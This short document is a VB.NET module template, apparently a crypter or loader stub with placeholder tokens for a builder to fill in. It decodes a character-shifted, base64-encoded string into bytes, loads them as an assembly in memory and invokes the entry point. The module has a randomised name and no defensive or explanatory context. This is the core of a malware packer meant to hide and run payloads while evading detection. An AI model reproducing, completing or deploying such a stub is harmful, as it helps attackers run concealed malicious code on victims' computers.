
Module rNEXDSSyvIx


    Sub main()

        Dim %1% As String = "%2%"




        Dim %3% As Byte() = Convert.FromBase64String(%5%(%1%))





        Dim %4% As System.Reflection.Assembly = System.Reflection.Assembly.Load(%3%)
        %4%.EntryPoint.Invoke(Nothing, Nothing)


    End Sub
   
    Function %5%(ByVal txt As String) As String
        Dim newtext As String = Nothing
        For Each i As Char In txt
            newtext += ChrW(AscW(i) - %100%)
        Next
        Return newtext
    End Function
End Module